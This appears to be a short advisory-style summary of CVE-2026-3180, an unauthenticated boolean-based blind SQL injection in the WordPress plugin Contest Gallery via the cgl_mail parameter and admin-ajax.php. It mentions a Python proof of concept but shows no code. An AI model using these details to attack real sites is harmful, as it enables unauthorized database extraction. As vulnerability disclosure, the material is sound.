This technical exploit details an unauthenticated blind SQL injection vulnerability identified as CVE-2026-3180 in the WordPress plugin 'Contest Gallery' versions 28.1.4 and earlier. The flaw originates from the improper use of the sanitize_email() function on the cgl_mail parameter, which fails to remove single quotes. This allows user-controlled input to reach the wpdb->get_row() function without necessary parameterization via prepare().
An attacker can leverage this vulnerability to perform boolean-based blind SQL injection attacks by sending crafted AJAX requests to the admin-ajax.php endpoint. The provided Python proof-of-concept demonstrates how to trigger the vulnerability by injecting SQL payloads into the email field, enabling data extraction from the database without requiring any authentication.
Top comments (0)